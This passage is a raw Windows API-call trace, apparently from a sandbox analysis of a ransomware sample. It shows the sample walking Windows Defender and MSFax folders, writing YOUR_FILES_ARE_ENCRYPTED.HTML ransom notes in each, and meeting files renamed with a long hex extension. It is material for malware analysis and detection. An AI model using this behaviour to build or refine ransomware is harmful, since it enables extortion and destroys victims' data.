lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.992] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0169.992] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.992] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.992] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0169.992] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.992] GetProcessHeap () returned 0x270000 [0169.993] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.993] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned 60 [0169.993] GetProcessHeap () returned 0x270000 [0169.993] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.993] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0169.994] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*" [0169.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc09ae60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc09ae60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f31c0 [0169.994] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.994] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.994] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.994] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.994] GetProcessHeap () returned 0x270000 [0169.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.996] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned 55 [0169.996] GetProcessHeap () returned 0x270000 [0169.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.996] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0169.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*" [0169.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.996] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned 63 [0169.996] GetProcessHeap () returned 0x270000 [0169.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.996] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0169.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*" [0169.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.996] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 76 [0169.997] GetProcessHeap () returned 0x270000 [0169.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.999] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0169.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0169.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc09ae60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc09ae60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.000] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0170.000] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.000] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.000] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0170.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.000] GetProcessHeap () returned 0x270000 [0170.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.001] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 71 [0170.001] GetProcessHeap () returned 0x270000 [0170.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.001] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0170.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0170.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcc0c0fc0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0c0fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.001] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0170.001] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.001] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.002] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0170.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.002] GetProcessHeap () returned 0x270000 [0170.003] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: 
hHeap=0x270000) returned 1 [0170.003] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.003] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.003] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.003] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.003] GetProcessHeap () returned 0x270000 [0170.004] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.004] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.004] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.004] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.004] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.004] GetProcessHeap () returned 0x270000 [0170.005] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.005] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned 57 [0170.005] GetProcessHeap () returned 0x270000 [0170.005] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.005] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" [0170.005] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*" [0170.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc10d280, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc10d280, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned 148 [0170.006] lstrcmpW (lpString1="MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.006] PathFindExtensionW (pszPath="MPLog-07132009-215552.log.B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23" [0170.006] lstrlenW (lpString=".B131BA2315EE1194E58B123E2CABFC51D913354140362886F581C1CF30FE5F23") returned 65 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.006] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.006] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.006] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.006] GetProcessHeap () returned 0x270000 [0170.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.007] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.007] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.007] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.007] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.007] GetProcessHeap () returned 0x270000 [0170.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0170.014] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned 43 [0170.014] GetProcessHeap () returned 0x270000 [0170.014] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0170.016] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT" [0170.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*" [0170.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, 
ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1cb960, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1cb960, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.016] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 49 [0170.016] GetProcessHeap () returned 0x270000 [0170.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.019] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0170.019] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*" [0170.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1a5800, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1a5800, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.019] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 61 [0170.019] GetProcessHeap () returned 0x270000 [0170.019] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.020] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0170.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0170.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1333e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1333e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.021] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0170.021] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.021] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.021] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0170.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
